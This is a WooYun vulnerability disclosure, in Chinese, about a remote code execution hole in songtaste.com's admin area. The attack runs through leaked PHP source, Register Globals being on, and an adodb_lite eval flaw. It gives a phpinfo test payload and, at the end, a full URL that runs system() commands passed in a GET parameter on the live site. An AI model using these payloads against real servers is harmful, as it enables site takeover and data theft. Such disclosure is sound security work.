WooYun.org

首先，我发现在搜索引擎里搜索songtaste.com的话（个人习惯，由于上次报告问题给songtaste.com的时候他们没有重视，我想找到当时的注射放到新开的认领里，这样可能以更好的渠道让他们重视）

inurl:php?id= site:songtaste.com

会发现image.songtaste.com会直接泄漏源码，访问时依然可以直接下载，这就是SongTaste.com遇到的第一个问题，我猜测这是www.songtaste.com的一台备份服务器，并且由于一些原因去掉了php的解析，而操作者很明显没有注意到该台服务器其中包含的php文件的泄漏问题。通过该问题和www上的一些应用逻辑，我可以下载到了任意的代码。
本来是想通过php代码来寻找漏洞以尝试获得应用的访问权限，但是在读了一些代码之后，我发现服务器的php的设置为

Register Globals on
	Magic Quote on

这样的配置，因为他程序里的变量都是系统自动生成的，逻辑里没有特别注册为全局变量的代码。这里特别是Register Globals为on的设置将导致更多的安全问题，所以我就继续寻找问题。前台没有太多特殊的东西，于是我尝试寻找后台那些不对外开放的逻辑里可能存在更多的安全问题。
后台很容易寻找，事实上也是上次一位白帽子反馈给我的一个问题

http://www.songtaste.com/administrator/

在后台里的代码里的这么一行引起了我的注意

include(S_CFG_PATH.'global.cfg.php');
	include(S_LIB_PATH.'adodb_lite' . DS . 'adodb.inc.php');
	include(S_LIB_PATH.'global.fn.php');

其中adodb_lite是一个第三方的库，大家知道，对于第三方的库，其实安全性是最无法得到保障的，因为一些原因，很多的安全研究者乐于寻找其中的安全问题并且披露出来，我早期在blog里（大概是07年），曾经披露过该库的一个远程代码执行漏洞，具体原因是由于变量未初始化导致的，利用环境是需要可以自动注册全局变量。

eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
测试方式为：
adodb-perf-module.inc.php?last_module=Exception{};phpinfo();/*

但是因为是个人Blog性质，估计注意的人不多，所以这个问题在很多的企业程序里依然存在，因为他们的代码不开源，所以一段时间风险还不会暴露，但是一旦发生今天这种由于配置将程序目录结构和逻辑及组件对外公开的情况就会导致严重的问题了。由于服务器的配置满足我们的利用（Register Globals on）
根据目录结构，我们反推实际的线上URL为

http://www.songtaste.com/administrator/lib/adodb_lite/adodb-perf-module.inc.php?last_module=Exception{};phpinfo();/*
	很幸运，一击即中，站点沦陷，数据全部可以控制了。
<code>
http://www.songtaste.com/administrator/lib/adodb_lite/adodb-perf-module.inc.php?d=w&last_module=Exception{};system(stripslashes($_GET[d]));die();/*